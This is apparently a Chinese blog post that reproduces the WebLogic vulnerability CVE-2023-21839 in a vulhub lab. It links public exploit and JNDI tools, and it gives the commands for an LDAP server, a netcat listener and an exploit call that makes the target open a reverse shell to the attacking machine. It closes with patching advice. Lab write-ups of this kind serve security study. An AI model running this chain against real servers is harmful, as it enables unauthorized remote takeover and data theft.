CVE-2023-21839漏洞复现(基于vulhub)

最新推荐文章于 2024-04-23 10:22:31 发布
最新推荐文章于 2024-04-23 10:22:31 发布
阅读量772 收藏 7
点赞数 1
文章标签: 安全
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/weixin_63960760/article/details/132814586
版权

一、漏洞简介

由于Weblogic IIOP/T3协议存在缺陷,当IIOP/T3协议开启时,允许未经身份验证的攻击者通过IIOP/T3协议网络访问攻击存在安全风险的WebLogic Server,漏洞利用成功WebLogic Server可能被攻击者接管执行任意命令导致服务器沦陷或者造成严重的敏感数据泄露。

二、漏洞影响版本

Oracle WebLogic Server == 10.3.6

Oracle WebLogic Server == 12.1.3

(注:10.3.6及12.1.3 版本目前官方已停止维护)

Oracle WebLogic Server == 12.2.1.3.0

Oracle WebLogic Server == 12.2.1.4.0

Oracle WebLogic Server == 14.1.1.0.0

三、漏洞成因

由于Weblogic t3/iiop协议支持远程绑定对象bind到服务端,并且可以通过lookup查看,当远程对象继承自OpaqueReference时,lookup查看远程对象,服务端会调用远程对象getReferent方法。weblogic.deployment.jms.ForeignOpaqueReference继承自OpaqueReference并且实现了getReferent方法,并且存在retVal = context.lookup(this.remoteJNDIName)实现,故可以通过rmi/ldap远程协议进行远程命令执行。
具体产生原因参考:
CVE-2023-21839分析 - 先知社区

四、漏洞复现

环境搭建

靶机:Ubuntu  192.168.30.134
攻击机:kali  192.168.30.135

基于vulhub靶场

cd /weblogic/CVE-2023-21839    #进入靶场所在目录
docker-compose up -d   #启动weblogic靶场环境
docker ps  #查看端口号
访问 http://ip:port/console

显示以下界面则环境搭建完成
image.png

复现过程

工具的下载

漏洞利用exp地址:
https://github.com/4ra1n/CVE-2023-21839

将文件下载后解压
之后进入cmd目录下
只有一个main.go文件
image.png
需要使用go环境进行编译
得到可执行文件(.exe)

go环境的搭建参考:
https://blog.csdn.net/liu_chen_yang/article/details/132012969

配置好go环境后
使用以下命令编译go文件

go build -o  xxx.exe    xxx为生成的exe文件的文件名

成功生成.exe文件
image.png

至此 exp工具搭建完毕

JNDI注入工具
下载地址:
https://github.com/WhiteHSBG/JNDIExploit/releases/tag/v1.4

下载完工具后解压
image.png
用法:

java -jar  JNDIExploit-1.4-SNAPSHOT.jar -i 192.168.xxx.xx
#最后的ip地址为起ldap服务的ip地址

攻击

首先使用jndi利用工具
运行以下命令 启动ldap服务

java -jar  JNDIExploit-1.4-SNAPSHOT.jar -i 192.168.xxx.xx
#ip地址为攻击机地址或者本地主机地址
#由于我的kali攻击机的java版本过高 所以使用本机ip启动
#也可以将kali的java版本降低

image.png
出现上述形式 则表示成功启动ldap和http服务(本次实验实验ldap服务)

之后使用kali 启动监听 监听端口为7777

nc -lvvp 7777

image.png

最后使用编译好的exe文件 运行以下命令

CVE-2023-21839.exe -ip 192.168.xxx.xx -port 7001 -ldap ldap://192.168.xxx.xx:1389/Basic/ReverseShell/192.168.xxx.xx/7892
#第一个ip地址为靶机的IP地址  
#第二个IP地址为启动ldap服务的IP地址 
#第三个ip地址为攻击机ip地址(反弹地址+port)

回车执行
出现以下界面
image.png

而在启动ldap服务窗口
显示访问Basic/ReverseShell/192.168.xxx.xx/7892
状态码为200
image.png

已经执行反弹shell命令
之后到kali中查看是否反弹shell界面
反弹shell成功
image.png

反弹shell不成功可能是由于java版本过高
建议使用jdk1.8

五、修复建议

  1. 使用连接筛选器临时阻止外部访问7001端口的T3/T3s协议
  2. 禁用IIOP协议。
  3. 升级weblogic版本,更新最新补丁。

参考文章:

https://blog.csdn.net/Myu_wzy/article/details/130406912
https://blog.csdn.net/qq_69775412/article/details/132189767

别忘跟我玩
关注
  • 1
    点赞
  • 7
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
CVE-2023-21839:Weblogic反序列化漏洞复现
薛定谔嘚喵博客
04-16 3625
WebLogic是美国Oracle公司出品的一个application server,确切的说是一个基于JAVAEE架构的中间件,WebLogic是用于开发、集成、部署和管理大型分布式Web应用、网络应用和数据库应用的Java应用服务器。将Java的动态功能和Java Enterprise标准的安全性引入大型网络应用的开发、集成、部署和管理之中。
Weblogic CVE 2023-21839漏洞复现
2301_80115097的博客
11-08 182
WebLogic 存在远程代码执行漏洞CVE-2023-21839/CNVD-2023-04389),由于Weblogic IIOP/T3协议存在缺陷,当IIOP/T3协议开启时,允许未经身份验证的攻击者通过IIOP/T3协议网络访问攻击存在安全风险的WebLogic Server,漏洞利用成功WebLogic Server可能被攻击者接管执行任意命令导致服务器沦陷或者造成严重的敏感数据泄露。
【高危】WebLogic Server 远程代码执行漏洞复现及攻击拦截 (CVE-2023-21839)
xsharkrasp的博客
05-18 561
近日,Oracle WebLogic Server被检测到远程代码执行漏洞(CVE-2023-21839),该漏洞允许未经身份验证的远程攻击者通过T3/IIOP协议网络访问并破坏WebLogic服务器,成功利用此漏洞可导致关键数据的未授权访问或直接获取WebLogic服务器权限。当远程对象继承自OpaqueReference时,客户端在对该对象进行JNDI查找并获取的时候,服务器端实际上是通过调用远程对象的getReferent()方法来获取该对象的实际引用。发起攻击请求:新建/tmp/1.txt文件。
[ vulhub漏洞复现篇 ] vulhub 漏洞集合(含漏洞复现文章连接)
最新发布
小司机的奥拓
04-23 1421
介绍:Vulhub是一个面向大众的开源漏洞靶场,无需docker知识,简单执行两条命令即可编译、运行一个完整的漏洞靶场镜像。计划:这里记录了 vulhub 所有的漏洞,本专栏也会将这些漏洞全部复现,欢迎持续订阅我也会不定期再中间更新复现文章链接目的:以复现 vulhub 漏洞为路径,展示不同的渗透思路及手法,同类漏洞我会尽量用多种渗透思路进行复现,不仅仅是提高个人能力,也是想再 CSDN 这个平台认识更多的安全爱好者。
CVE-2023-21839Vulhub Weblogic未授权远程代码执行漏洞复现
qq_43175881的博客
09-26 276
CVE-2023-21839 漏洞复现过程
【已复现】Apache Struts 文件上传漏洞(CVE-2023-50164)安全风险通告第二次更新
smellycat000的专栏
12-12 972
●点击↑蓝字关注我们,获取更多安全风险通告漏洞概述漏洞名称Apache Struts 文件上传漏洞漏洞编号QVD-2023-46516、CVE-2023-50164公开时间2023-12-07影响对象数量级十万级奇安信评级高危CVSS 3.1分数8.1威胁类型代码执行利用可能性中POC状态已公开在野利用状态未发现EXP状态未公开技术细节状态已公开利用条件:该漏洞的利用依赖于特定环境的条件,需要根...
漏洞复现--Confluence未授权管理用户添加 (CVE-2023-22515)
qq_53003652的博客
10-16 1882
2023年10月4日,Atlassian官方发布了对于CVE-2023-22515漏洞的补丁。这个漏洞是由属性覆盖导致,利用该漏洞攻击者可以重新执行Confluence安装流程并增加管理员账户。Atlassian Confluence是企业广泛使用的wiki系统。nuclei已上线该yaml (CVE-2023-22515)此时用户已经创建完毕,登录。
Weblogic远程代码执行漏洞CVE-2023-21839)复现
yunshang_secure的博客
12-23 1830
复现过程中,会出现各种各样报错,小伙伴多找网上文章解决,本文仅作参考。
CVE-2023-21839 Weblogic IIOP RCE复现
Love&Share
04-14 1545
WebLogic是美国Oracle公司出品的一个application server,用于本地和云端开发、集成、部署和管理大型分布式Web应用、网络应用和数据库应用的Java应用服务器。WebLogic Server是一个基于JAVAEE架构的中间件,将Java的动态功能和Java Enterprise标准的安全性引入大型网络应用的开发、集成、部署和管理之中,提供了Java Enterprise Edition (EE)和Jakarta EE的可靠、成熟和可扩展的实现。
[Java安全]—weblogic常见漏洞
Sentiment的博客
07-11 3431
本来想跟一些T3反序列化的,奈何本地环境怎么都起不起来先复现一下常见漏洞吧。。。Weblogic是美国Oracle公司出品的一个应用服务器(application server),确切的说是一个基于Java EE架构的中间件,是用于开发、集成、部署和管理大型分布式Web应用、网络应用和 数据库应用的Java应用服务器。Vulhub - Docker-Compose file for vulnerability environment 启动环境后访问,进入后台弱口令直接登录weblogic常用弱口令: htt
【渗透测试】Weblogic系列漏洞
weixin_53972936的博客
11-01 3226
WebLogic是美国Oracle公司出品的一个application server,确切的说是一个基于JAVAEE架构的中间件,WebLogic是用于开发、集成、部署和管理大型分布式Web应用、网络应用和数据库应用的Java应用服务器。将Java的动态功能和Java Enterprise标准的安全性引入大型网络应用的开发、集成、部署和管理之中。
CVE-2023-6548 和 CVE-2023-65的Citrix Netscaler/ADC-13.0-92.21 最新补丁
01-19
针对CVE-2023-6548 和 CVE-2023-6549 的 NetScaler ADC 和 NetScaler Gateway 的漏洞补丁升级包 CVE-2023-6548 :在管理接口上执行经过身份验证的(低特权)远程代码 CVE-2023-6549:拒绝服务 2、 强烈建议受影响...
复现CVE-2023-21839
Coder的博客
05-02 1795
下载jdk1.8或#创建java文件夹#解压后更改文件夹名字为 jdk1.8.0.372#将文件夹移动到/usr/local/java目录下验证是否安装成功javac如有提示,安装完成。
WebLogic Server 远程代码执行漏洞复现 (CVE-2023-21839)
0xSec
02-11 5314
WebLogic存在远程代码执行漏洞,该漏洞允许未经身份验证的远程攻击者通过T3/IIOP协议网络访问并破坏易受攻击的WebLogic服务器,成功利用此漏洞可能导致Oracle WebLogic服务器被接管或敏感信息泄露。
vulhub漏洞复现77_zabbix
weixin_44193247的博客
02-14 1531
vulhub漏洞复现练习篇
CVE-2023-6931
02-29
很抱歉,我无法提供关于CVE-6931的具体信息,因为我无法访问互联网。但是,我可以告诉你一些关于CVE的基本知识。 CVE(Common Vulnerabilities and Exposures)是一种用于标识和跟踪计算机系统中已知漏洞的标准化方法。每个CVE条目都包含一个唯一的标识符,以及有关该漏洞的描述、影响范围、解决方案等信息。 CVE标识符由"CVE-"加上年份和一个唯一的数字序列组成。例如,"CVE-2023-6931"表示该漏洞是在2023年被发现的第6931个漏洞。 如果你想了解更多关于CVE-2023-6931的具体信息,我建议你查阅相关的安全公告、漏洞报告或者咨询安全专家。

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值